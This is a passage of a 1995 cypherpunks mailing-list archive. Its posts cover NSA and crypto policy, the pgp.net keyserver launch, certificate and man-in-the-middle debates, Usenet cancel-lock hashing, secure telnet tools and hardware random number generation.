loading some DMDRVR.BIN driver only - my BIOS only sees 550Mb or so 
without it...)

Is this a question of upgrading, if so, what's the latest version?  And 
are there any catches, snags, or problems to watch out for before I 
potentially kill my drives? :-)

A few more questions, I've left a bit of space for me to experiment with 
something like OS/2Warp or Win95 or even Netware 4.1 (got a cool 2 user 
license for $50 from Novell I'd like to install.)  Now while OS/2 and 
Win95 can see FAT partitions, what will stop them from trying to run 
something like chkdsk on it?  Can I load the secure drive tsr to keep the 
encrypted drive safe with those operating systems?  

(I know Netware will keep its mits off non-Netware partitions, so that's 
a safe bet - but then I don't have another PC to use as a host so this will
be a clientless server. Just want to experiment with it I guess...  :-)

I'd also consider messing with NT, I have enough RAM and space, but 
anyone know a place I can get a good price for it? $400 is a bit steep 
for an OS I probably won't do much with.

And YES, I will install Linux - soon as I can get it to recognize my 
I/O-less FutureDomain clone SCSI controller. (It's based on the 950 chip, 
no I/O address, uses int 15 and DMA for transfers..)   Works okay under 
Coherent - then again, I'm using the IDE controller under Coherent... :-)
The SCSI FD controller is for the CDROM drive...

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Thu, 5 Oct 95 16:18:09 PDT
To: cypherpunks@toad.com
Subject: Re: Comments on STT Spec Implementation Details
Message-ID: <199510052312.QAA08154@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Responding to msg by perry@piermont.com:

[snip]

>The belief that companies can make more money by 
>following proprietary  solutions and imposing them on 
>the world as standards is falling  away. It is in 
>Microsoft's interest that the standard that is adopted  
>for commerce be open, publically discussed at length, 
>and brutally  critiqued. Losing a bit of control in 
>exchange for actually getting  something that works out 
>for you and your customers is in your interest.


The spew through the proprietary dike on this is
swelling: MasterCard's consortium yesterday and the
NetManage/Cylink today both emphasize public availability
of specs in counter-response to the flaws helpfully
discovered in Netscape by the ever public spirited
cypherpunks.

Whether any of these vaunted "superior" systems respond
to attacks as constructively as Netscape will be the
challenge.

BTW, has anyone reviewed the promised MasterCard specs
supposedly released on Tuesday?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 5 Oct 95 13:37:46 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
In-Reply-To: <199510050757.DAA22982@ducie.cs.umass.edu>
Message-ID: <199510052037.QAA05653@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> Matt Blaze writes:
> # It seems best to encourage the realistic side of NSA as much as possible...
> 
> James Donald writes:
> > Why? Surely the realists are more dangerous than the nuts.
> 
> One way to look at it is this:
> 
> Could a Nutty NSA carry out its Nutty Agenda ?

I'd like to say the following: I don't think the NSA is inherently the
enemy at all. Signals intelligence and protecting the U.S. and its
citizens from signals intelligence is probably necessary. As a radical
libertarian, I'd like to see these activities carried out in the
private sector, but thats another story.

The real problem with the NSA is the same as the problem with the FBI
re: digital telephony. They've gotten used to a certain model of how
the world works and rather than adapt to new times where most people
have access to strong crypto, they have decided to use the laws to try
to retard the inevitable.

I'm sure some NSA types are listening, so let me say this: there is no
way on earth to stop the progress of a technology who's time has
come. I've heard an idiot from the FBI actually say in public, in
response to statements that the vast amount of open literature makes
it impossible to stop bright 14 year olds from writing good crypto
code, that "we aren't going to just accept this". Well, go off and
accept reality, folks. You can't stop strong cryptography from being
in the hands of the public. What you can do, however, is cost the
nation and the world billions if not trillions in damage. If crypto
had been in cellphone signaling equipment earlier billions in stolen
cellphone calls would have been saved -- ditto for credit card
systems. All you can succeed in doing is leeching the economy white
while trying to save a model that is doomed. You can't stop strong
crypto any more than the horseshoe makers could stop the automobile.

Learn to live with a new model for how you work now, and you will save
years of bitter and futile agony for everyone.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 5 Oct 95 14:02:45 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
In-Reply-To: <199510051433.HAA11813@blob.best.net>
Message-ID: <199510052102.RAA05690@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" writes:
> If that is the case, then the "Nutty Agenda" is perfectly sane.  They 
> want to rule over us.  There is nothing crazy about that. Evil yes.  
> Crazy no.  Their objective is to create a surveillance state, where 
> all actions are known and recorded by the state, in order to 
> facilitate detailed state control over every aspect of our lives.  Our 
> agenda is the opposite.  There is no commonality of purpose, hence no 
> possibility of cooperation.   

I disagree. Most NSA types are probably stock government employees who
want to get their job done with the least muss and fuss. Some of them
actually have pride in their work. Very few of them are likely
actively evil.

Just as I tend to see all computer systems installations in terms of
securing them from attack (a couple of clients have noted I have
security on the brain!), I suspect they see all things in the world in
terms of signals intelligence. Whenever anything comes up that
threatens their day to day way of doing things, they react badly --
its very natural. They don't want their work made hard or, even worse,
their jobs destroyed.

Certainly some of their masters at some times have been evil, and will
continue to be in the future, just as in any governmental
organization. Certainly some individuals working in the organization
are evil. However, in general, what you are looking at is just the
result of an entity trying to preserve itself having access to
governmental force. I doubt that there are many "national domination"
types in the agency, and there don't need to be for their agenda to be
opposed to ours.

I'll point out, though, that if anything this makes our job harder,
because strong crypto in the hands of the bulk of the world's
population will cost some jobs at NSA, and the only think harder to
dissuade than an evil madman is someone worrying about how he is going
to feed his kids once he's forced out of the government sector. Such
people will say almost anything to preserve their agency.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Leyland <pcl@sable.ox.ac.uk>
Date: Thu, 5 Oct 95 09:23:42 PDT
To: cypherpunks@toad.com
Subject: Announcement: keys.pgp.net
Message-ID: <199510051621.RAA18321@sable.ox.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



First the summary for those people who don't like reading more than one
paragraph. The address pgp-public-keys@keys.pgp.net reaches one of
several email keyservers.  pgp-public-keys@keys.<country>.pgp.net goes
only to key servers for <country>.  A start has been made on other
services such as ftp.pgp.net.  In particular, see http://www.pgp.net/pgp
for more information.


The domain "pgp.net" was registered last year in preparation for
providing a simple and unified name space for PGP infrastructure such as
key servers, software distribution sites and so on.

The first steps to populate the pgp.net domain have now been taken.
They are small steps, but we believe, important ones.  Many more will be
taken over the next few months.  The first additions are for the email
public key server network. The key servers are presently known by a
number of different names, none of which are particularly obvious to the
uninitiated.  Worse, many of them are run by students or employees
without the official backing of their host organizations.  It's not
surprising that some are unreliable and/or short-lived.  A recent
development, however, is that more and more servers are being run by
CERT teams.  Examples include those run by DFN-CERT (Germany), CERT-NL
(Netherlands) and OxCERT (Oxford University).  It is in the best
interests of the teams that the keyservers be reliable and available.
The validity of the keys themselves, of course, must be checked by their
users with the usual signature checking built into PGP.

We have, therefore, set up "keys.pgp.net" as a set of equal-priority MX
records in the DNS.  What this means, in practice, is that email sent to
pgp-public-keys@keys.pgp.net will be sent to a randomly chosen
keyserver.  It probably doesn't matter which one, as the servers are
synchronized.  If the first server your mail system tries is not
available, it should automatically try the other servers until one
works.  This should give a rather more rapid and sucessful response than
the current mechanism.  It is also rather easier for documentation
writers, FAQ maintainers and such like to give advice which has a long
shelf-life.

We recognize that, for efficiency reasons, users of key servers might
want to be able to specify a local machine rather than be handed a
randomly selected one.  The old names will continue to work: the address
pgp.ox.ac.uk (for example) will continue to reach the OxCERT keyserver
and no others.  However, we have also registered sub-domains of pgp.net.
In particular, the records for "whatever.uk.pgp.net" will only map to
machines for the United Kingdom.  At the moment we have the following
records in place, with the expectation that more will follow:

   keys.de.pgp.net      Germany          DFN-CERT
   keys.no.pgp.net      Norway           Univ. of Tromso
   keys.uk.pgp.net      United Kingdom   OxCERT, Oxford
   keys.us.pgp.net      United States    MIT

Large regions, such as the US, will eventually have several servers,
each of which will be the target of equal priority MX records.   We
expect the Netherlands to join in with keys.nl.pgp.net very shortly.

Allocation of key servers to the pgp.net domain is only the first step.
Plans are advanced to set up a number of other sub-domains, all with the
format <service>[.<region>].pgp.net.  This structure allows for local
customization and yet preserves the uniformity and simplicity of the
naming scheme.  For instance, the Web-site www.de.pgp.net would,
presumably, have the text of the pages in German and would be the site
recommended in German documentation, while ftp.no.pgp.net would be the
principal archive of PGP-related material in Norway.

So far, only ftp.pgp.net and www.pgp.net have been allocated.   The URL
http://www.pgp.net/pgp has more information on the pgp.net domain as it
currently exists and will be kept up to date as the domain becomes more
populated.

Expect to see more developments along these lines later this year; all
will be reported on http://www.pgp.net/pgp

The following folk all had a hand in the initial stages of setting up
pgp.net:


Piete Brooks              University of Cambridge, United Kingdom
Borge Brunes              University of Tromso, Norway
Klaus-Peter Kossakowski   DFN-CERT, Germany
Brian LaMacchia           MIT, United States of America
Paul Leyland              OxCERT, United Kingdom
Teun Nijssen              CERT-NL, Netherlands




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Cheng <jcheng@pipeline.com>
Date: Thu, 5 Oct 95 14:22:50 PDT
To: cypherpunks@toad.com
Subject: is this a bug of Netscape
Message-ID: <Pine.3.89.9510051715.A1420-0100000@pipe6>
MIME-Version: 1.0
Content-Type: text/plain


If you go to http://c.gp.cs.cmu.edu:5103/prog/webster, you will get a 
input textbox and two buttons, leave textbox blank and push Look Up 
Definition button, you will get a GPF?
I am using Netscape V1.2N for windows.
Sorry if you have knew it.

J





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 17:41:02 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510060039.RAA18405@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> writes:
>  I think the old idea of a certificate just binding a name and
>a key is turning out to not be very useful.  That is why Netscape
>Navigator 2.0 will support x509 version 3 certificates.  They allow
>arbitrary attributes to be signed into a certificate.  In this new
>world, you can think of a certificate as a way of binding a key with
>various arbitrary attributes, one of which may be(but is not
>required to be) a name.

OK, so suppose I want to send my credit card number to Egghead Software.
I get one of these new-fangled certificates from somebody, in which
VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
can agree that by itself this is not useful.  So, it will also bind in
some attribute.  What will that attribute be?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 5 Oct 95 17:56:42 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510051924.MAA25839@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951005174118.5095B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> The thing to keep in mind is, why do we want certificates?  Why not just
> use unsigned keys?  If I encrypt a message for Carl based on some key I
> found lying around somewhere which someone told me is his, and I send it
> to his mailbox, and I get a reply back, how secure is that?  We all know
> that you don't get the full security of the encryption if you do this.
> Man in the middle attacks might not be easy to do in such a situation but
> they are certainly possible.  It is such attacks that certificates (including
> PGP key signatures) are designed to prevent.

I think Carl's point is that when you write an e-mail to Carl, you 
probably don't care that it reaches the "real" Carl Ellison, because you 
don't have a binding between the name "Carl Ellison" and the physical 
person.  A binding between a name and a key is useless if there is no 
binding between the name and the person.  Since this is the case, why not 
forget about the binding between the name and the key (or turn it into a 
local one as I suggested in the previous post) and go straight to the 
binding between the key and the person?

On the other hand, if you do have a binding between the name and the 
person, then most likely you met Carl at some point in the past and he 
told you his name was Carl Elison.  In that case it would have been just 
as easy for him to give you his public key instead.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Man In Black <mib@io.com>
Date: Thu, 5 Oct 95 16:05:50 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Digestable
Message-ID: <Pine.BSI.3.91.951005180218.7621A-100000@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


Would whoever posted information on a free cypherpunks digest please 
repost?  Thanks.

=]=




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 5 Oct 95 17:12:06 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
Message-ID: <30747427@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Perry E. Metzger wrote:

>The real problem with the NSA is the same as the problem with the FBI
>re: digital telephony. They've gotten used to a certain model of how
>the world works and rather than adapt to new times where most people
>have access to strong crypto, they have decided to use the laws to try
>to retard the inevitable.

Perry is absolutely right about this.  We have been living in a "golden era" 
for the FBI and NSA.  By analogy, we have also been living in a golden era 
for physicians:  during the last several decades (in the developed world 
anyway) we have relied on antibiotics to the point where they are taken for 
granted.  This time has passed, and there is no going back.  The Golden Age 
of Antibiotics is over.

Similarly, the Golden Age of Wiretaps is over.  No amount of wishful 
thinking and convoluted logic can put the genie back into the bottle.  An 
attempt to (in effect) make certain types of mathematics illegal will only 
serve to knock us out of our technological leadership position, not make our 
country safe from terrorism and drugs.  Given a world in which strong crypto 
is actually used, and that use is illegal, how can a government make the 
punishment fit the crime?  Would all use of illegal cryptography be treated 
as though there was an actual threat of terrorism?  The death penalty?  This 
is, of course, an absurd point of view.  The government could no more 
accomplish this than they could make muttering over the phone (thereby 
defeating a plaintext wiretap), or the use of obscure language (such as 
Native American dialects) illegal.  It just doesn't hang together as a 
rational approach.

Like physicians, the FBI and the national security operations must devise 
alternative schemes to combat the real "enemy," terrorists and drug dealers 
 -- not mathematicians and ordinary citizens trying to have a private 
conversation.  The suppression of basic rights that would be required in any 
attempt to overcome the "force of nature" that is human knowledge would make 
a mockery of our "inalienable rights" as free people to conduct our lives 
without fear of the overbearing scrutiny of unrestrained government.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gerdw@cougar.vut.edu.au (David Gerard)
Date: Thu, 5 Oct 95 02:25:38 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <6FBccD15w165w@bwalk.dm.com>
Message-ID: <45040d$8cd@cougar.vut.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 04 Oct 95 10:47:30 EDT, Dr. Dimitri Vulis (dlv@bwalk.dm.com) wrote:
:[alt.religion.scientology restored, since that's where most of the discussion
:of forged cancels has been taking place so far ]

[snip snip snip]

:When an article is posted, two quantities are computed by the posting program:
:M1 = H(article body + newsgroups + message-id + date + passphrase) and
:M2 = H(M1). The posted article contains the header "Cancel-lock: M2".
:When an attempt is made to cancel/supersede an article X with a "Cancel-lock:"
:header, the user is asked to supply the passphrase. The posting software
:computes M1 = H(X's body + newsgroups + X's message-id + date + passphrase)
:once again and adds the "Cancel-key: M1" header to the article containing
:"Control: cancel <X>" or "Supersedes: <X>" that's being posted.
:(Note that without knowing the passphrase it's intractable to match the M1.)
:Whenever news server software (such as inn) detects either "Control: cancel
:<X>" or "Supersedes: <X>", INN should retrieve the original article <X> and
:looks for the "Cancel-lock: M2" header. If one is found, then the old article
:may be cancelled only if the new article contains the header "Cancel-key: M1"
:such that H(M1) = M2.



One thing that occurs to me: suppose I go to control, collect cancel messages,
and build myself a collection of M1's that will work with a given M2?

That is, I can't actually invert the hashing function. But if a given
hash function is standard, then I can eventually build up a collection of
M1s for M2s that will let me cancel quite a few things I may want to.
How many cancel messages come through in a day?



--
Reverend Doctor David Gerard, KoX, SP 4.03 (awaiting verification of SP 5)
Prestige Elite(tm) Research Church of the SubGenius
"Servicing the Prestige Elite(tm) since 1985!"
OK, clams. You want war? You've got war.
--
Please email ALL followups (crappy and thoroughly dysfunctional newsfeed).
Personal visits from Scientologists will be greeted with extreme hostility
  and the vigilant attention of VUT Security, but personal physical violence
  *only* when appropriate, legal and called-for.
gerdw@cougar.vut.edu.au (preferred); fun@suburbia.apana.org.au
July 5, 1998, 7 AM. Saucers. End of the world. Your US$30 is your trip ticket.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 18:22:27 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951005111048.24409B-100000@eskimo.com>
Message-ID: <199510060121.SAA25213@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai <weidai@eskimo.com> writes:

>In this scheme, the man-in-the-middle problem goes away because you are 
>no longer trying to communicate with a True Name, whose binding with a 
>key can be spoofed, but rather with the key itself.  If the holder of 
>that key chooses to act as a middle-man by relaying messages around, that 
>is his business, and there is really nothing you can do about it.

Carl Ellison has been arguing a similar point for some time, if I
understand him, which I may not!

The man in the middle problem is a difficult one, but I don't think
you're going to get away with defining the problem out of existence.
There is a difference between a MITM and the case you describe where you
are actually communicating securely with the person you think you are,
but he chooses to relay the messages around.  The difference is that if
you are actually communicating securely with an individual, you can form
some estimate of his personality, judgement, etc.  You may choose on this
basis to trust him, provide sensitve information, take risks, and so on.
But if he is actually behind a MITM then all bets are off.  All of your
judgement about him is irrelevant.  At any time the MITM can take
advantage of the information you provide.  He can even "blow his cover"
and take extreme action, to your detriment.

This situation with the MITM is actually about the same as if you were
communicating insecurely in the first place.  You are exposed to all of
the same risks.
So if you are willing to accept communicating systems that allow this
kind of attack, you almost might as well not use cryptography at all.
(Not quite, because the MITM is a more expensive attack to mount than one
on an unsecured wire.)

In fact, I can facetiously prove that cryptography is unnecessary.  We
are not communicating with individuals, but with communicatees.  All of
your messages are by definition going to the communicatee with whom you
are communicating.  If the particular communicatee who is receiving
your message chooses to relay it or spread the information around in
other ways, that is the right and privilege of the communicatee.  But
messages are going to the communicatee they are going to, whether
encryption is used or not.  So encryption is not necessary.

This argument seems to mirror the one for why we only communicate with
keys, that if a key wants to do something nasty we can't stop it (him?),
etc.  I say, we don't communicate with keys.  We communicate with people
(or occasionally programs).

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael J Gebis <gebis@ecn.purdue.edu>
Date: Thu, 5 Oct 95 16:38:42 PDT
To: cypherpunks@toad.com
Subject: Re: SSL telnet vs. SSH. Comparison?
In-Reply-To: <199510051751.NAA03127@book.hks.net>
Message-ID: <199510052338.SAA02892@purcell.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


> Would somebody please compare for me SSL telnet vs. SSH in terms of
> security, advantages, and disadvantages?
> 
I'm not answering your question, but if people are looking for secure
telnet implementations, here's a list that I saved from a while back.
It's a bit obsolete (for example, I think ssh is on version 1.2.0 now)
but it will get people started.

I've been using ssh for a while, and it's the ultimate in convenience.
If you haven't tried it, give it a look.  (I make no claims about the
security; hopefully, someone on the list will take a look and do an
in-depth analysis. :)

###BEGIN INCLUDED FILE###
Thanks to everyone who responded to my posting regarding a `secure
telnet' implementation:

    Is there a (possibly free) implementation of something like a
    "secure telnet"?  I'm looking for a way to login into a remote
    system providing secure interactive communication between the two
    hosts over (possibly insecure) Internet connections.

Here's a summary of the implementations I am now aware of:
* SSL 
There is a free implementation of Netscape's SSL Protocol (Secure
Socket Layer) by Eric Young named "SSLeay"
<ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/>.  Eric Young is also the
author of a popular DES Library.
<ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/>

SSL provides a secure authentication and encryption basis on top of
which application protocols like telnet, ftp, and http may be
transparently added <http://home.netscape.com/info/SSL.html>.
However, the RC4 encryption using a 40 bit key, which is employed by
SSL, has recently been cracked with a brute force attack, see
RISKS-17.27 <http://catless.ncl.ac.uk/Risks/17.27.html#subj1>.

A modified version of telnet that uses SSL-based authentication and
encryption is also available
<ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/>.


* Deslogin

Deslogin by Dave Barrett <barrett@asgard.cs.colorado.edu> provides a
network login service much like rlogin/rlogind.  Deslogin uses a
`challenge-response' protocol to authenticate users.  Also, all data
transmitted to and from the remote host in encrypted using the DES.
Deslogin also includes a command-line program `cipher' for fast DES
encryption. <ftp://ftp.uu.net/pub/security/des/>


* SRA Telnet 

This is a version of the SRA Telnet modified by the Technical
University of Chemnitz.  A session key is negotiated using an
uncertified Diffie-Hellman-Method and used for the encryption of UID
and password.  The complete session text in encrypted with DES in CFB
mode. <ftp://ftp.tu-chemnitz.de/pub/Local/informatik/sec_tel_ftp>


* Ssh

Ssh (Secure Shell) is a program to log into another computer over a
network, to execute commands in a remote machine, and to move files
from one machine to another.  It provides strong authentication and
secure communications over insecure channels.  Among other features,
Ssh is a complete replacement for rlogin, rsh, and
rcp. <ftp://ftp.funet.fi/pub/unix/security/ssh-1.0.0.tar.gz>


* Skey

Bell Canada's `skey' free-ware implements a one-time password system,
so that sniffers can get your ID and PW, but can't use the PW next
time. <ftp://ftp.cert.dfn.de/pub/tools/password/SKey/>


----------------------------------------------------------------------
I provide this information in the hope that it will be useful, but
with no claim of either completeness or correctness.  Thanks again to
all who contributed to compile the above information.

-- 
    Jochen Schwarze
    <jochen.schwarze@studbox.uni-stuttgart.de>

###END INCLUDED FILE###
-- 
Mike Gebis  gebis@ecn.purdue.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 5 Oct 95 19:02:38 PDT
To: cypherpunks
Subject: The Intelligence community -- some interesting web pages
Message-ID: <9510060202.AA05514@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I particularly liked the NSA surrogate home page under the second URL. --John

From: farber@central.cis.upenn.edu (David Farber)

Try looking at

http://www.awpi.com/IntelWeb/ -- IntelWeb - The WWW Site of
Intelligence Watch Report (IWR)

and

http://www.fas.org/pub/gen/fas/irp/ -- Project on
Intellience Reform  federation of American Scientists





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 5 Oct 95 17:12:40 PDT
To: cypherpunks@toad.com
Subject: Re: NetManage & Cylink Crypto
Message-ID: <9510060012.AA02236@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
>  The link with Cylink will allow NetManage to license and include
>  the Cylink public key encryption technology in its applications
>  with a variety of ciphering systems to be used in the NetManage
>  suite, including: DES, Triple DES, Safer, IDEA, Skipjack, RC-2,
                                                   ^^^^^^^^
>  and RC-4.

Hey, this is interesting...  will Skipjack be included in future NetManage  
products or is this press-release only mentioning Skipjack as an example of a  
possible encryption algorithm for use with NetManage?


andrew
"Gentlemen, start your disassemblers."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Oct 95 19:01:59 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
Message-ID: <ac99d8e3240210043452@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:11 PM 10/5/95, Jeff Weinstein wrote:

>  How about if the systems allows you to get a certificate that
>has any name in it that you want, where the issuer makes no
>claims about the identity of the owner of the certificate?
>How about if the software lets the user decide which CAs they
>will accept certificates from?  Given these two features,
>would you still consider requiring a certificate to be bad?

Let's make sure what we mean by these two points:

1. "...allows you to get a certificate that has any name in it that you
want, where the issuer makes no claims about the identity of the owner of
the certificate?"

I would expect that a certificate for "%63rrW209neU6q!" would be issuable
for a miniscule amount of money, and as many of these as are desired.

(No, I'm not saying "Verisign" must offer certificates for very low cost,
only that there be no built-in costs, or built-in time delays and
processing delays, that would prevent "Tim's Really Cheap and No Questions
Asked Certificate Service" from issuing such certificates, cheaply and
rapidly (in seconds, or less, as some applications will need this, if other
services "demand" certificates).

2. "...software lets the user decide which CAs they will accept
certificates from?"

Fine, provided the following CAs are acceptable:

-- an "automatic" certificate granter, essentially meant only to satisfy
protocols which require certificates

-- a certifier for the Mob, which sells certificates for some fee

-- the application itself should be able to generate certificates
immediately...call this the "null certification."

It is true that some of these example seem to "undermine" the whole purpose
of certificates, but this is precisely my point: if I want a key to be
certified, I will determine the conditions under which I want it to be
certified. Other parties are free to meet my conditions if they wish to do
business with me, or not, as the case may be.

The "null certification" is thus very important.

Naturally, I think this null certification makes the idea of _requiring_
certification moot.

Will Netscape allow this?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Thu, 5 Oct 95 19:25:24 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
Message-ID: <ac9a42dc01021004b46d@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:
....
> What about a beam of high intensity ionising radiation aimed at the
> detector?
....
You presumably use the oddness of the count for your random bit in some
predetermined time interval. External radiation can change, but not bias
the parity. If the counter saturates, the counter may be biased towards one
parity but the software can easily detect saturation presuming it gets the
count.

You can use the source in a smoke detector.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 5 Oct 95 19:17:04 PDT
To: cypherpunks@toad.com
Subject: Insiders vs. Outsiders...a Nice Metaphor
Message-ID: <ac99ded12502100498ea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:03 PM 10/5/95, Carl Ellison wrote:

>Crypto is used for making sure that insiders get in while outsiders are
>kept out of encrypted files/messages.
>
>Strong crypto does a better job of keeping outsiders out.
>
>Things like TIS CKE are mechanisms for making sure that insiders continue
>to get in, in spite of mishaps with their keys.
>
>
>Any such system can be evaluated on its technical merits (does it really
>separate the insiders from the outsiders as well as it claims to?) (does it
>survive various disasters (because if it doesn't survive, it can't keep
>insiders in)?)
>
>
>This is a separate topic from GAK -- which boils down to the Government's
>claim that it should be listed as an insider for everybody.
>
>
>That's what needs to be brought to everyone's attention.


This is a very nice metaphor for what is going on.

It also touches on some of the issues about key certification. The issue of
who a person is has nothing to do directly with whether they are an
"insider" or an "outsider."

(In fact, who a person "really is" is almost beside the point.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 5 Oct 95 17:52:22 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: subjective names and MITM
In-Reply-To: <199510060021.UAA02958@homeport.org>
Message-ID: <199510060051.UAA04613@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>	Just a minor nit regarding a well thought out post, public
>keys are not 'global' ids, but 'system-wide' IDs.  For keys to be
>really global, there needs to be a mechanism in place for insuring
>that key ids are very probably unique.  One way to ensure that keys
>are globally unique would be to integrate a KCA identifier with the
>keyid, and KCAs base part of their reputation on not signing multiple
>keys with the same id.

A public key *is* "very probably unique".  A "randomly selected" 1024 bit
prime number has a specific amount of entropy in it.  The likelihood of
two users world wide "randomly" choosing the same such prime may be
precisely determined (assuming you can figure the entropy).

Who needs a KCA to certify it?

The real benefit of the KCA is as a means of linking the key with a unique
person.  As I've commented before, anonyms have no meaningful "credit rating".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Thu, 5 Oct 95 19:35:22 PDT
To: cypherpunks@toad.com
Subject: Re: GC Tech GlobeID pilot
Message-ID: <199510060253.TAA28173@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



>        http://globeid.gctech.fr/cgi-gid/welcome?Language=English

>Sorry again, but because real content is and will be available
>we commited to deliver only a few hundreds Web Wallets for this
>pilot. You can still use the web form to apply for one...

Except for this clause...

| Caution: Following form is provided for demonstration purpose only. 

| If you really want to participate to the Globe ID electronic wallet pilot 
| program, please contact Mr. Pierre Edelman or GID95@GCTech.fr. 

On the surface, this doesn't look much different than First Virtual or any
of the myriad other "let me hold your credit card number for you" sites.
--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net
                  "Shoot the Fruit Loop"               408.469.9400
 
"On the Information Superhighway,
  I'm the guy behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jms@tennis.opus1.com (It's like a network, only different)
Date: Thu, 5 Oct 95 23:29:27 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <modemacDFr0qB.IyK@netcom.com>
Message-ID: <1995Oct5.200410.306@tennis.opus1.com>
MIME-Version: 1.0
Content-Type: text/plain


